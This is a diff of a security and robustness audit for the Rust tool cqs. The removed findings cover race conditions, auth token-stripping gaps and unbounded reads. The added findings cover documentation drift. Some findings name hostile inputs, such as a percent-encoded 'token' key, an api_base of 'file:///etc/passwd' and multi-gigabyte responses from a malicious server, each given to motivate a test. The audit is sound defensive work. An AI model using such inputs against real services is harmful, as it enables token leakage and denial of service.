-  - Recommend adding `flock` on `<slot>/index.db.lock` (or a new `slot.lock` in `.cqs/slots/<name>/`) acquired by both `slot_remove` and the indexer, so the second to-arrive blocks or errors instead of corrupting.
-
-#### TC-ADV-1.30-4: Non-blocking HNSW rebuild — no test for thread panic, dim drift, or store-open failure
-- **Difficulty:** medium
-- **Location:** `src/cli/watch.rs:965-1042` (`spawn_hnsw_rebuild`), `:1058+` (`drain_pending_rebuild`). Existing tests at `:3979-4115` cover `delta` replay, dedup, error-clears-pending, in-flight stays-pending.
-- **Description:** The rebuild thread runs `cqs::Store::open_readonly_pooled`, then `build_hnsw_index_owned`, then `build_hnsw_base_index`. Several adversarial paths are not exercised:
-  - **Thread panic mid-build**: the closure at `:980-1030` is *not* wrapped in `std::panic::catch_unwind`. A panic inside `build_hnsw_index_owned` (e.g., from `unwrap` on a corrupt vector during `id_map.clone()`) unwinds the thread, which means the `let _ = tx.send(result)` at line 1029 *never runs* — the receive side hits `TryRecvError::Disconnected` on the next `drain_pending_rebuild` poll. That path *does* clear pending (line 1066-1068), so the daemon recovers. But the *delta* (chunks captured during the rebuild window) is **silently dropped** — those chunks are never inserted into any index until the next full rebuild trigger. No test covers this drop.
-  - **Store dim drift**: line 985-991 explicitly checks `store.dim() != expected_dim` and bails. No test exercises this — the test fixture at `:3979` builds `state` directly, not via `spawn_hnsw_rebuild`, so the dim-drift bail path has zero coverage. After #1105 (named slots), this is *the* defense against `cqs slot promote` flipping the active slot to a different-dim model mid-rebuild.
-  - **Store open failure**: line 984 `cqs::Store::open_readonly_pooled` can fail with `SQLITE_BUSY` (concurrent migration), `SQLITE_CANTOPEN` (slot dir gone — see TC-ADV-1.30-3), or schema mismatch. All collapse to `RebuildOutcome::Err`, which `drain_pending_rebuild` clears (line 1100+ in the `Err(_)` arm). Untested.
-  - **Spawn-failure path** (line 1031-1036): a `Builder::spawn` failure (resource exhaustion) returns a `PendingRebuild` whose `rx` is a *fresh, unsent channel* — `try_recv` returns `Empty` forever, NOT `Disconnected`. The pending state is leaked: the watch loop thinks a rebuild is in flight indefinitely and never spawns a follow-up. **This is a real bug, not just a coverage gap** — comment says "channel will hang up on first poll" but `tx` is dropped at end of `spawn_hnsw_rebuild`'s scope only because the closure was never moved into a thread. Actually re-reading: `tx` was moved into the closure that failed to spawn, so it's dropped, and `rx.try_recv()` would return `Disconnected`. OK so the leak is closed — but the test that pins this should exist.
-- **Suggested fix:** Add to `src/cli/watch.rs::tests` (alongside `drain_pending_rebuild_*`):
-  - `test_spawn_hnsw_rebuild_dim_mismatch_clears_pending` — set up a `Store` with `dim=768`, call `spawn_hnsw_rebuild(…, expected_dim=1024, …)`, then `drain_pending_rebuild`; assert pending is cleared and the watch state has no dangling channel.
-  - `test_spawn_hnsw_rebuild_thread_panic_drops_delta_loudly` — wrap the rebuild closure or use a temporary feature flag to inject a panic; assert the delta is *not* silently dropped (current behavior). The fix is to wrap the closure in `catch_unwind` and replay the delta into `state.hnsw_index` on panic.
-  - `test_spawn_hnsw_rebuild_store_open_fails_clears_pending` — point at a non-existent index path; assert `drain_pending_rebuild` clears pending after the receiver sees the error.
-  - `test_spawn_hnsw_rebuild_failure_to_spawn_disconnect_path` — synthesize spawn failure (rlimit on threads, or stub `Builder::spawn` via injection); assert a follow-up `drain_pending_rebuild` clears via `Disconnected`.
-
-#### TC-ADV-1.30-5: `serve` auth — `strip_token_param` does not handle case variants, percent-encoded `token`, or leading `?token=` after a `?`-less path
+#### README canonical command list omits `cqs hook` and `cqs status` (#1182 commands)
 - **Difficulty:** easy
-- **Location:** `src/serve/auth.rs:101-115` (`strip_token_param`). Existing tests at `:269-291`.
-- **Description:** Three cases not pinned:
-  - **Case mismatch**: `?Token=abc` (capital T) — `pair.starts_with("token=")` is false, kept in the redirect URL. Browsers preserve case; some CLIs lowercase. The token won't match `ct_eq` either (token is URL-safe base64, mixed case-sensitive), so this never authenticates — but the leftover `?Token=…` in the redirect URL leaks the token into the address bar, defeating the SEC-7 design goal.
-  - **Percent-encoded `token`**: `?%74oken=abc` (`%74` = `t`) — same issue, the percent-encoded prefix fails the literal `starts_with` check and the redirect carries the (still-bad) param through. RFC 3986 says `%74` and `t` are equivalent at the URI level; clients may normalize at random.
-  - **Empty value `?token=`**: not tested. `pair.strip_prefix("token=")` returns `Some("")`; `ct_eq("", expected)` is false, so it falls through to `Unauthorized`. But no test pins this — a future refactor could accept empty tokens.
-  - **Trailing `&` / double `&`**: `?token=abc&&depth=3` — `query.split('&')` produces an empty string between the `&&`. The empty pair fails `starts_with("token=")` and survives into the rejoined query. The redirect URL has `?depth=3` (since join uses `&`), but if the *only* other param were such an empty pair the redirect emits a stray empty query slot. Cosmetic but untested.
-  - The deeper concern: `check_request` at `:158-172` only matches *literal* `token=…` in the query string, by the same `starts_with` check. So a percent-encoded `token` query param is silently treated as no token — a user pasting a URL into a browser that just happens to percent-encode `t` (Safari does this in some flows for non-ASCII surrounding context) gets a 401 for what should be a valid token. Untested.
-- **Suggested fix:** In `src/serve/auth.rs::tests` (extend the existing `strip_token_param_*` set):
-  - `test_strip_token_param_case_insensitive` — pin behavior on `?Token=…` (ideally: also stripped, since the auth check should be case-insensitive on param name to match HTTP convention).
-  - `test_check_request_rejects_percent_encoded_token_key` — `%74oken=…` — assert 401 (current behavior) or fix to decode.
-  - `test_strip_token_param_handles_double_ampersand` — `?token=abc&&depth=3` — pin redirect output.
-  - Recommend a one-line fix: percent-decode the *key* using `percent_encoding::percent_decode_str` (already in the dep tree) before the prefix check, and lowercase the key for comparison. Token *value* stays exact-match for `ct_eq`.
-
-#### TC-ADV-1.30-6: `validate_slot_name` accepts names that the OS or shell will misinterpret
-- **Difficulty:** easy
-- **Location:** `src/slot/mod.rs:159-178`, `src/slot/mod.rs:661+` (existing tests).
-- **Description:** Pure `[a-z0-9_-]+` with max 32 chars seems safe, but two concrete cases bite:
-  - **Names starting with `-`**: `validate_slot_name("-foo")` returns `Ok(())`. When passed to `cqs index --slot -foo`, clap's positional/long-flag parser will treat `-foo` as a flag, not a value to `--slot`. The user gets a confusing clap error far from the slot module. Untested.
-  - **Names ending with `-`**: `"foo-"` passes. Cosmetically fine on Linux/macOS but `cqs slot remove foo-` — `cqs slot remove` accepts the name OK, but `fs::remove_dir_all(slot_dir(…, "foo-"))` then operates on `.cqs/slots/foo-/`. On Windows, trailing dashes in directory names are legal, no issue. The real problem: shell completion / `gh` URL passes / Slack mentions silently strip trailing dashes from many copy-paste paths.
-  - **Names that are integer-shaped**: `"42"` passes. Then `cqs slot create 42 --model bge-large` is fine, but a future consumer that does `--slot $(cat foo)` where `foo` contains numeric data is fine — yet some shell pipelines pass numeric strings through to flag parsers as positional args by accident. Documenting that integer-shaped names are valid is enough; no current bug, but pinning the contract is cheap.
-  - **Pure-underscore names**: `"_"`, `"__"`, `"_____"` all pass. `cqs slot create _` is legal. UI prints `*  _   chunks=0 …`. Cosmetic, untested. Pinning behavior with a test means future column-alignment / log-parsing changes don't silently break.
-- **Suggested fix:** Add to `src/slot/mod.rs::tests`:
-  - `test_validate_rejects_leading_dash` — `validate_slot_name("-foo")` should error (because of clap collision), or document and pin if intentionally accepted. Recommend rejecting: a name starting with `-` cannot be passed as a `--slot` argument value without `--slot=-foo`, which most users won't know.
-  - `test_validate_rejects_trailing_dash` — pin behavior; recommend rejecting for consistency.
-  - `test_validate_accepts_pure_underscore_or_underscore_only` — pin current behavior so a future "must contain alphanumeric" tightening surfaces as a test break, not silent UX change.
-
-#### TC-ADV-1.30-7: `slot::migrate_legacy_index_to_default_slot` rollback path is untested
-- **Difficulty:** medium
-- **Location:** `src/slot/mod.rs:511-593` (migration), specifically the rollback loop at `:561-582`. No test for partial-failure rollback in `src/slot/mod.rs::tests` (`:850+` covers happy path + idempotency only).
-- **Description:** The migration moves N files (typically `index.db` + `index.db-wal` + `index.db-shm` + 4 HNSW files + SPLADE = 8 candidates) from `.cqs/` to `.cqs/slots/default/`. If `move_file` fails on file K (cross-device, permission denied, EBUSY on Windows because `index.db-wal` is still open by a concurrent reader), the rollback loop at line 562-571 reverses the moves of files 1..K-1. Failure modes:
-  - **Rollback itself fails**: line 564-569 logs but does not abort. After a failed rollback, files 1..K-1 are in `slots/default/`, file K is in the original `.cqs/` directory, and the active_slot pointer is **never written** (line 585 only runs on success). The next migration call hits the `slots_dir.exists()` check at line 523 and returns `Ok(false)` — *the project is now permanently broken* with files split across two locations. Untested.
-  - **`fs::remove_dir(&dest)` at line 573 fails** because `slots/default/` contains rolled-back files that haven't been moved out. The cleanup is skipped silently (`let _ =`) so the next run sees `slots/` exist and does nothing. Same broken-project state. Untested.
-  - **EBUSY on Windows for `index.db-wal`** specifically: this is the realistic trigger. A daemon running the watch loop holds the WAL open. A user runs `cqs index` from another shell, which does `Store::open` → triggers migration. WAL is locked. Migration step 2 (`-wal`) fails. Step 1 (`index.db`) succeeded — already moved into `slots/default/`. Rollback moves it back. Cleanup tries to `remove_dir(&dest)`. Now there's only one outcome: the project is fine. *Unless* the rollback `move_file(slots/default/index.db, .cqs/index.db)` itself fails (e.g., something raced to create a file at the target path) — then we have split state, no rollback, no test.
-- **Suggested fix:** Add to `src/slot/mod.rs::tests`:
-  - `test_migrate_rollback_on_second_file_failure` — plant `index.db` and `index.db-wal`, make `index.db-wal` fail to move (e.g., open it with an exclusive handle on Linux via `flock`, or remove read perms on the parent dir mid-test). Assert the rollback restores `index.db` to `.cqs/`, `slots/` is fully cleaned up, and the next migration call still works.
-  - `test_migrate_rollback_failure_leaves_loud_signal` — make rollback itself fail (chmod the source dir read-only after the first move). Assert the migration returns `Err(SlotError::Migration(…))` AND the user-visible state contains a *single* known signal (not silent split state). Recommend writing a `.cqs/migration_failed` marker file the daemon checks at startup, or refuse to start when `slots/` and `.cqs/index.db` both exist.
-
-#### TC-ADV-1.30-8: `LocalProvider` accepts non-HTTP `api_base` URLs and unbalanced `concurrency` configurations
-- **Difficulty:** easy
-- **Location:** `src/llm/local.rs:88-121` (`LocalProvider::new`), `:128-312` (`submit_via_chat_completions`), `:153` (channel sized at `concurrency.max(8) * 2`).
-- **Description:** Three under-tested edge cases on the new (#1101) provider:
-  - **Non-HTTP scheme**: `api_base = "file:///etc/passwd"` or `"gopher://example/"`. `Client::post(&url)` accepts the URL; `reqwest` errors at request time with a generic "URL scheme is not allowed" but the error is downgraded to `LlmError::Http` via `?` and retried 4× (each retry sleeping 500ms→4s). 7.5s wasted per item × N items, no specific signal that the user typo'd `file://` for `http://`. Untested.
-  - **`api_base` with trailing slash**: `"http://x/v1/"` → `format!("{}/chat/completions", self.api_base)` → `"http://x/v1//chat/completions"`. Most servers handle the doubled slash; some (strict nginx configs, some llama.cpp builds) 404. The user's mock at `make_config(&format!("{}/v1", server.base_url()), …)` always uses no trailing slash. No regression test.
-  - **`api_base` without `/v1`**: `"http://x"` → `"http://x/chat/completions"`. Some servers expect it (vLLM defaults to `/v1`); others reject. The doc at line 80-82 says "any server that speaks `/v1/chat/completions`" but the code does not enforce or normalize. No test pins the contract.
-  - **`concurrency=64, items=1`**: line 153 sizes the bounded channel at `concurrency.max(8) * 2 = 128` for a single item. 64 worker threads spin up, 63 immediately exit on closed-channel after the single item is consumed. Wasteful but harmless — until you note it does this for *every* `submit_*` call inside the same daemon, and worker-thread allocation under heavy churn is non-trivial on glibc. No test verifies that small batches don't spawn full-concurrency thread pools.
-- **Suggested fix:** Add to `src/llm/local.rs::tests`:
-  - `test_non_http_api_base_fails_fast` — `make_config("file:///tmp/foo", …)`, `submit_batch_prebuilt(&items, …)`. Assert error returns within ~100ms (no 7.5s × N retry stall). Recommend adding a one-line URL scheme check in `LocalProvider::new`: bail if `Url::parse(&api_base).scheme() != "http" && != "https"`.
-  - `test_api_base_with_trailing_slash_works` — pin behavior so the doubled-slash case either succeeds (current httpmock probably accepts) or normalizes.
-  - `test_concurrency_clamped_to_item_count_when_smaller` — recommend `let workers = self.concurrency.min(items.len()).max(1);` at line 166. Test that for `items.len()=1`, only 1 worker thread is spawned (verify via thread name enumeration or a counter in a custom worker-spawn hook).
-
-#### TC-ADV-1.30-9: Embedder `provider::ort_runtime_search_dir` and `find_ld_library_dir` — no test for malformed `/proc/self/cmdline` or pathological `LD_LIBRARY_PATH`
-- **Difficulty:** easy
-- **Location:** `src/embedder/provider.rs:67-83` (`ort_runtime_search_dir`), `:115-123` (`find_ld_library_dir`), `:34-62` (`ensure_ort_provider_libs`). No `#[test]` block in this file at all — provider detection paths are exercised only end-to-end via `Embedder::new`.
-- **Description:** This file moved out of `embedder/mod.rs` in #1120 (Phase A) and gained the explicit symlink-and-search logic. It now reads `/proc/self/cmdline`, parses up to the first NUL, decodes UTF-8, and joins against CWD. Untested adversarial inputs:
-  - **`/proc/self/cmdline` empty / single NUL**: `cmdline.iter().position(|&b| b == 0)` returns `None` (if no NUL) or `Some(0)` (if first byte is NUL). For `Some(0)`: `argv0 = ""`, `argv0.starts_with('/')` is false, falls through to `current_dir().ok()?.join("")` → `current_dir`. Then `abs_path.parent()` returns `Some(current_dir.parent())`. The symlink directory becomes the *parent* of CWD. If CWD is `/home/user/proj/.cqs`, ORT search dir becomes `/home/user/proj/`. Probably benign (no provider .so files there). But if CWD is `/`, parent is `None` and `ensure_ort_provider_libs` silently does nothing — provider activation fails on the first call, caller falls back to CPU with no diagnostic. Untested.
-  - **Non-UTF8 argv[0]**: `std::str::from_utf8(&cmdline[..argv0_end]).ok()?` returns `None`. Function returns `None`. Same silent-CPU-fallback. Untested. While Linux argv[0] *should* be UTF-8, container runtimes occasionally inject non-UTF-8 bytes via `exec` for sandboxing / launchers.
-  - **`LD_LIBRARY_PATH` with empty entries**: `"::/foo:"` — `ld_path.split(':')` produces `["", "", "/foo", ""]`. Filter `!p.is_empty()` rejects all empties. Then `Path::new("/foo").is_dir()` decides. Untested for the `LD_LIBRARY_PATH=":"` corner case.
-  - **`LD_LIBRARY_PATH` containing the ORT cache itself** (`:ort_lib_dir`): the filter `!ort_cache_str.starts_with(p)` excludes *prefixes* of the ORT cache. If `ort_lib_dir = /home/u/.cache/ort.pyke.io/dfbin/x86_64-…/v1.x` and `LD_LIBRARY_PATH = /home/u/.cache`, the filter drops `/home/u/.cache` because `ort_cache_str` does start with it. Probably correct intent. But `LD_LIBRARY_PATH = /home/u/.cache/ort.pyke.io/dfbin/x86_64-unknown-linux-gnu/v0.x` (sibling cache version) is *not* a prefix of the active ORT lib dir, so it passes the filter and gets symlinks pointed *into* a stale ORT version's cache. Symlink overwrite of the user's other ORT install. Untested.
-- **Suggested fix:** Create `src/embedder/provider.rs::tests` (currently empty):
-  - `test_ort_runtime_search_dir_handles_empty_cmdline` — write a file at a temp path that begins with NUL; inject via test-only env var override or test-only feature flag. Assert returns `None` or a documented sentinel.
-  - `test_find_ld_library_dir_skips_empty_entries` — `LD_LIBRARY_PATH=":/tmp:"`, assert it picks `/tmp` and not `""`.
-  - `test_find_ld_library_dir_does_not_pick_sibling_ort_version_dir` — set up two cache dirs `…/v0.x` and `…/v1.x`, point `LD_LIBRARY_PATH` at `…/v0.x`, assert the symlink target is *not* `…/v0.x` (since that would corrupt the older cache). Recommend changing the prefix-check to a path-containment check via `Path::ancestors()`.
-
-#### TC-ADV-1.30-10: `cache::EmbeddingCache::insert_many` — `blake3_hex_or_passthrough` accepts non-hex content_hash bytes that look like hex
-- **Difficulty:** easy
-- **Location:** `src/cache.rs:709-721` (`blake3_hex_or_passthrough`), `:674-703` (`insert_many`). No test for the passthrough/encode branch boundaries.
-- **Description:** The function checks: if the bytes are valid UTF-8, length 64, and all ASCII hex digits → pass through; otherwise hex-encode each byte. Edge cases not tested:
-  - **64-byte UTF-8 with NUL bytes that happen to be in ASCII hex range**: NUL (0x00) is not in `0..='9' | 'a'..='f' | 'A'..='F'`, so the all-hex check fails and we fall through to encode. Good. But not tested.
-  - **64-byte UTF-8 that is all hex but uppercase**: `"ABCDEF…"` — `b.is_ascii_hexdigit()` accepts uppercase. So the cache stores uppercase hex for some entries and lowercase (the encoded path) for others. **Two writes for the same content_hash with different case produce two different cache rows.** PRIMARY KEY enforces uniqueness at the row level, but `(content_hash, model_fingerprint)` rows differ by case — so a chunk hashed once via passthrough (uppercase) and once via encode (lowercase) duplicates and both linger. Untested.
-  - **Non-64-byte hex strings**: `"abc"` (3 bytes UTF-8, all hex). Length check fails (3 != 64). Falls into encode → `"616263"` is stored. Each call with the same input is deterministic, but a caller passing a 32-char hex string gets a 64-char hex of the *bytes of that hex string*, not its decoded value. Surprising. Untested.
-  - The deeper issue: this function exists because `Chunk::content_hash` is *already* a hex string (lowercase, 64 chars), and the cache schema declares the column as `TEXT`. The passthrough is a fast path. Anything that doesn't fit the fast-path contract collides into a parallel hex encoding. Two different inputs can produce the same output: `b"\xab\xcd…"` (64 bytes) → hex-encode → 128 ascii chars; vs the literal string `"abcd…"` (64 chars, valid hex) → passthrough → 64 chars. These don't collide at length 64 vs 128, but they do at any matching length. *Specifically*: passing a 64-byte raw input where every byte happens to be `0x30` (ASCII '0') — that's UTF-8, hex-only, 64 chars long → passthrough as `"00…0"`. Vs another caller passing the literal 32-byte hex string `"00000000000000000000000000000000"` (32 chars, hex) → fails length check → encode → `"3030…30"` (64 chars). Different outputs. OK no collision. But an attacker controlling content_hash could craft inputs that hit the passthrough boundary intentionally; a more conservative fix is to *always* hex-encode and never trust passthrough.
-- **Suggested fix:** Add to `src/cache.rs::tests`:
-  - `test_blake3_hex_or_passthrough_uppercase_hex_passthrough` — pin: uppercase 64-char hex passes through unchanged. If we want lowercase invariant, normalize.
-  - `test_blake3_hex_or_passthrough_short_hex_string_gets_encoded` — pin: 32-char hex string is encoded, not passed through (the surprising case).
-  - `test_insert_many_does_not_dup_when_caller_alternates_passthrough_and_encode` — write the same logical chunk twice, once with hex string bytes and once with raw blake3 bytes; assert exactly one row in the DB after both inserts. This currently fails. Recommend: always normalize via blake3 hash of input bytes if length is not exactly 64 lowercase hex; or kill the passthrough fast path entirely (cost: one allocation per write — negligible).
-
-## Summary
-
-10 findings. Highest-impact gaps cluster around v1.30.0's *new* surfaces:
-1. **#1101 LocalProvider** — unbounded body reads (TC-ADV-1.30-1, TC-ADV-1.30-8) DoS the daemon on a single hostile or panicked LLM endpoint. Trivial reqwest config fix.
-2. **#1105 Slots+Cache** — TOCTOU in concurrent slot ops (TC-ADV-1.30-3), untested rollback in legacy migration (TC-ADV-1.30-7), and *cross-slot* cache poisoning via NaN/Inf passthrough (TC-ADV-1.30-2) which #1105 made worse by extending the cache lifetime.
-3. **#1113 Background HNSW rebuild** — silent delta loss on thread panic (TC-ADV-1.30-4) is a real bug masked by an absent `catch_unwind`, plus dim-drift bail untested under concurrent slot promote.
-4. **#1118 Serve auth** (TC-ADV-1.30-5) — case-sensitivity and percent-encoding gaps in `strip_token_param` cause real SEC-7 leakage (token survives in URL bar after redirect).
-5. **#1120 Provider feature split** (TC-ADV-1.30-9) — silently falls back to CPU on malformed `/proc/self/cmdline` or pathological LD_LIBRARY_PATH; symlink target picking can corrupt sibling ORT cache versions.
-
-Lowest-priority but cheap to add: slot-name validation edges (TC-ADV-1.30-6), cache passthrough/encode duality (TC-ADV-1.30-10).
-
-
-## Robustness — v1.30.0
-
-Note: prior round (v1.29.0) findings RB-1..RB-10 were filed in `docs/audit-triage-v1.30.0.md` as RB-V1.29-{1..10} and are not repeated here. The findings below are scoped to code added/changed in v1.30.0 (#1090, #1096, #1097, #1101, #1105, #1110, #1117, #1118, #1119, #1120). Read each cited line; many of the surface-level `unwrap()`s in v1.30.0 are guarded by an upstream `Some/Ok` check or live in `#[cfg(test)]`.
-
-#### RB-V1.30-1: Local LLM provider buffers entire HTTP response without size cap
-- **Difficulty:** easy
-- **Location:** `src/llm/local.rs:97-100, 474-487, 492-499`
-- **Description:** `LocalProvider::new` builds a `reqwest::blocking::Client` with only a request timeout — no body cap, and `parse_choices_content` calls `resp.json()` which buffers the entire body before deserializing. A misbehaving (or malicious) local LLM server — particularly one a user pointed `CQS_LLM_API_BASE` at without auditing — can return a multi-GB JSON blob and OOM the cqs process during a `summarize` / `chat` batch. Same risk in `body_preview` via `resp.text().unwrap_or_default()` on the 4xx error path. The retry loop (`MAX_ATTEMPTS = 4`, `RETRY_BACKOFFS_MS` up to 4 s) means each oversize response gets up to four buffering attempts before the item is skipped, multiplying the wasted memory + wall time per item across `local_concurrency()` ≤ 64 worker threads.
-- **Suggested fix:** Pre-cap with a streamed read. Replace `resp.json()` with `resp.bytes()` after `Content-Length` inspection, or use a `take(N)` adaptor on the body — pick a 4 MiB cap on summary responses (a 50-token summary is a few hundred bytes; 4 MiB is ~1000× headroom). Apply the same cap to `body_preview` (replace `resp.text()` with a bounded read of ~2 KiB). New env var `CQS_LOCAL_LLM_MAX_BODY_BYTES` if a user wants to opt out.
-
-#### RB-V1.30-2: Slot pointer files (`active_slot`, `slot.toml`) read with unbounded `read_to_string`
-- **Difficulty:** easy
-- **Location:** `src/slot/mod.rs:207, 323`
-- **Description:** `read_active_slot` and `read_slot_model` use `fs::read_to_string(&path)` to load the active-slot pointer and per-slot config. Both files are owned by cqs and expected to be tiny (≤32 chars for the pointer, ~50 bytes for the model config), but a stray editor swap-file collision, a corrupted disk write, or a hostile co-tenant in a shared `.cqs/` directory can leave a multi-GB file behind. `read_to_string` then attempts to allocate the whole thing, OOM-ing every cqs invocation in that project until the user manually inspects `.cqs/`. Because `read_active_slot` runs on every CLI command (it's the slot-resolution fallback), a single bad pointer file effectively bricks the project for cqs.
-- **Suggested fix:** Read with a hard cap. E.g.:
-  ```rust
-  use std::io::Read;
-  let mut f = std::fs::File::open(&path)?;
-  let mut buf = String::new();
-  f.take(4096).read_to_string(&mut buf)?;
+- **Location:** `README.md:540-569`
+- **Description:** The dashed list of every CLI command at lines 540-569 is the README's own command index — `cqs ping`, `cqs eval`, `cqs model`, `cqs serve`, `cqs refresh`, `cqs doctor`, `cqs completions` are all listed. The two new top-level commands shipped with #1182 — `cqs hook` (install/uninstall/status/fire) and `cqs status --watch-fresh` — are missing from this list, even though they are demonstrated in the Watch Mode section earlier (lines 207-220). Per the team memory rule, "new CLI commands need full ecosystem updates," and the canonical command list is the agent-discoverable index. An agent grepping the README for "what commands exist" misses the two new ones.
+- **Suggested fix:** Insert two rows in the list around line 568:
   ```
-  4 KiB is enough for `slot.toml` (and 100× headroom on the pointer file); an oversize file becomes "treated as missing" with a `tracing::warn!`. Same pattern at both sites.
+  - `cqs hook install/uninstall/status/fire` - manage `.git/hooks/post-{checkout,merge,rewrite}` for watch-mode reconciliation. Idempotent; respects third-party hooks via marker check (#1182)
+  - `cqs status --watch-fresh [--wait [--wait-secs N]]` - report watch-loop freshness; `--wait` blocks until `state == fresh` (default 30 s, capped at 600 s) (#1182)
+  ```
+- **Existing issue:** none
 
-#### RB-V1.30-3: SystemTime → i64 casts in cache wrap silently after year 2554
+#### CONTRIBUTING Architecture Overview is stale — missing eval/, watch_status.rs, daemon_translate.rs, fs.rs, limits.rs, aux_model.rs, plus 6+ command files
 - **Difficulty:** easy
-- **Location:** `src/cache.rs:349-352, 551-555`
-- **Description:** Both `write_batch` and `prune_older_than` do `SystemTime::now().duration_since(UNIX_EPOCH).unwrap_or_default().as_secs() as i64`. `as_secs()` returns u64 — values above `i64::MAX` (≈ year 2554) wrap to negative and corrupt the `created_at` column / produce a negative cutoff that matches no rows. Latent (we are in 2026), but the `as_secs() as i64` cast pattern is also used elsewhere. None propagate an error — silent wrap is the failure mode.
-- **Suggested fix:** `i64::try_from(secs).map_err(|_| CacheError::Internal("clock above i64 cap"))?` at both sites. Defense-in-depth, the deadline is far away.
+- **Location:** `CONTRIBUTING.md:149-340`
+- **Description:** The Architecture Overview tree lists every top-level src file but is missing several that exist on main:
+  - `src/eval/` (mod.rs + schema.rs) — eval harness module, not listed
+  - `src/watch_status.rs` — `WatchSnapshot`, `SharedWatchSnapshot`, `FreshnessState` (#1182 Layer 3)
+  - `src/daemon_translate.rs` — `daemon_ping`, `daemon_status`, `daemon_reconcile`, `wait_for_fresh`, `FreshnessWait` (#1182)
+  - `src/fs.rs` (atomic_replace helper, #953)
+  - `src/limits.rs`
+  - `src/aux_model.rs`
+  - In `src/cli/commands/infra/`: `hook.rs`, `model.rs`, `ping.rs`, `slot.rs`, `status.rs` are missing from the list at line 166 (which stops at `audit_mode, cache_cmd, convert, doctor, init, project, reference, telemetry_cmd`)
+  - In `src/cli/commands/index/`: `umap.rs` missing
+  - `src/cli/commands/serve.rs` (top-level commands/, not listed)
+  - In `src/cli/watch/`: `reconcile.rs` (#1182 Layer 2) missing from the list at line 187-197
+  
+  Per the rule at CONTRIBUTING.md top-of-section ("update it when adding/moving/renaming source files"), this section is the contract between the codebase shape and contributor onboarding. Drift here means new contributors and dispatched agents misroute their first edit.
+- **Suggested fix:** Add the missing entries with one-line descriptions matching adjacent rows. Group `eval/`, `watch_status.rs`, `daemon_translate.rs`, `fs.rs`, `limits.rs`, `aux_model.rs` in the top-level src/ block. Append the missing command files to their category lines. Add `reconcile.rs - Layer 2 periodic full-tree reconciliation (#1182)` to the watch/ block.
+- **Existing issue:** none
 
-#### RB-V1.30-4: `migrate_legacy_index_to_default_slot` rollback leaves an undetectable half-state
+#### ROADMAP claims #1182 acceptance test still pending, but #1196 already merged
+- **Difficulty:** easy
+- **Location:** `ROADMAP.md:16` and `ROADMAP.md:142`
+- **Description:** Both lines say:
+  > "remaining acceptance item is the WSL-specific integration test"
+  
+  But `git log` shows `a240ad08 test(watch): bulk-delta reconcile pass for #1182 acceptance — 47-file scenario (#1196)` already merged before v1.30.1 cut. The 47-file bulk-delta reconcile test is the WSL acceptance scenario. The ROADMAP is now lying about open work — agents reading the roadmap will think there's still a test gap to fill.
+- **Suggested fix:** Update line 16 and line 142 to:
+  > "**Status (2026-04-28):** Layers 1-4 shipped (#1189 freshness API, #1191 periodic reconciliation, #1193 git hooks, #1194 eval `--require-fresh`); 47-file bulk-delta acceptance test landed in #1196. #1182 fully closed."
+- **Existing issue:** none
+
+#### PRIVACY/SECURITY claim platform-native cache dirs but document only the Linux path for query_log/query_cache
+- **Difficulty:** easy
+- **Location:** `PRIVACY.md:21-22`, `SECURITY.md:111-112,135-136`
+- **Description:** PRIVACY.md and SECURITY.md document the recent query embedding cache and query log as `~/.cache/cqs/query_cache.db` / `~/.cache/cqs/query_log.jsonl`. The implementation in `src/cache.rs:180-188` and `src/cli/batch/commands.rs:457-461` uses `dirs::cache_dir()` first and only falls back to `~/.cache`. On macOS this resolves to `~/Library/Caches/cqs/...`; on Windows, `%LOCALAPPDATA%\cqs\...`. The deletion instruction in PRIVACY.md:59 (`rm -rf ~/.cache/cqs/`) does not actually delete the cache on macOS/Windows.
+- **Suggested fix:** Match the cross-platform note already present in `src/cache.rs:171-174`. PRIVACY.md should list:
+  > - Linux: `$XDG_CACHE_HOME/cqs/...` or `~/.cache/cqs/...`
+  > - macOS: `~/Library/Caches/cqs/...`
+  > - Windows: `%LOCALAPPDATA%\cqs\...`
+  
+  Update the `rm -rf` block in PRIVACY.md:59 to instruct macOS users to also remove `~/Library/Caches/cqs/` and Windows users `%LOCALAPPDATA%\cqs\`. Apply the same to SECURITY.md filesystem tables at lines 111-112 and 135-136.
+- **Existing issue:** none
+
+#### README "Watch Mode" section omits the default `--wait-secs` budget (30 s)
+- **Difficulty:** easy
+- **Location:** `README.md:219-220`
+- **Description:** README:219 says `cqs status --watch-fresh --wait` "block until state == fresh (250 ms poll, capped at 600 s)" and the next line shows `--wait-secs 30  # custom budget`. The clap default at `src/cli/definitions.rs:792` is `default_value_t = 30`, i.e. 30 seconds is also the default — not a "custom budget" example. Without naming the default, an agent reading the README assumes the default is the 600 s cap (the only number stated) and writes scripts that wait up to 10 minutes silently. The CHANGELOG entry at `CHANGELOG.md:18` correctly says "30 s default budget, capped at 600 s."
+- **Suggested fix:** Replace lines 219-220 with:
+  ```
+  cqs status --watch-fresh --wait                     # block until fresh (default 30 s budget, 250 ms poll)
+  cqs status --watch-fresh --wait --wait-secs 600     # extend up to the 600 s cap
+  ```
+- **Existing issue:** none
+
+#### SECURITY.md auth claim names neither `cqs_token_<port>` cookie nor the AuthMode enum from #1135 / #1136
+- **Difficulty:** easy
+- **Location:** `SECURITY.md:17`
+- **Description:** SECURITY.md:17 describes the auth surface as "cookie handoff is `HttpOnly; SameSite=Strict`; compare is constant-time. `--no-auth` opts out". This is accurate as far as it goes, but it predates #1135 (cookie renamed to `cqs_token_<port>`) and #1136 (`AuthMode::Disabled(NoAuthAcknowledgement)`). The threat-model row should reflect both hardenings:
+  - Cookie name now port-scoped per RFC 6265 — without this clarification, an operator running multiple `cqs serve` instances on the same host doesn't learn that cqs has already solved the cookie-collision problem (and conversely doesn't realize that pre-v1.30.2 instances could leak tokens cross-port).
+  - `--no-auth` now requires constructing a `NoAuthAcknowledgement` proof token; an internal caller cannot accidentally ship a fully-open server. This is a load-bearing claim for anyone reviewing the security surface.
+  
+  Per the team's "Docs Lying Is P1" rule, SECURITY.md is the canonical surface for auth claims; omitting protections that were just landed makes the doc weaker than the code.
+- **Suggested fix:** Replace SECURITY.md:17 with:
+  > Per-launch 256-bit auth token gates every request (#1118 / SEC-7). Three credential surfaces: `Authorization: Bearer`, `cqs_token_<port>` cookie (port-scoped per RFC 6265, #1135), `?token=` query param. Cookie handoff is `HttpOnly; SameSite=Strict; Path=/`; compare is constant-time. Disabling auth requires `--no-auth` plus an internal `NoAuthAcknowledgement` proof token (#1136), so no internal caller can ship a fully-open server by accident; the disabled branch logs a structured `tracing::error!` regardless of `quiet`.
+- **Existing issue:** none
+
+#### CONTRIBUTING test count and file count out of date (uses pre-#1105 numbers)
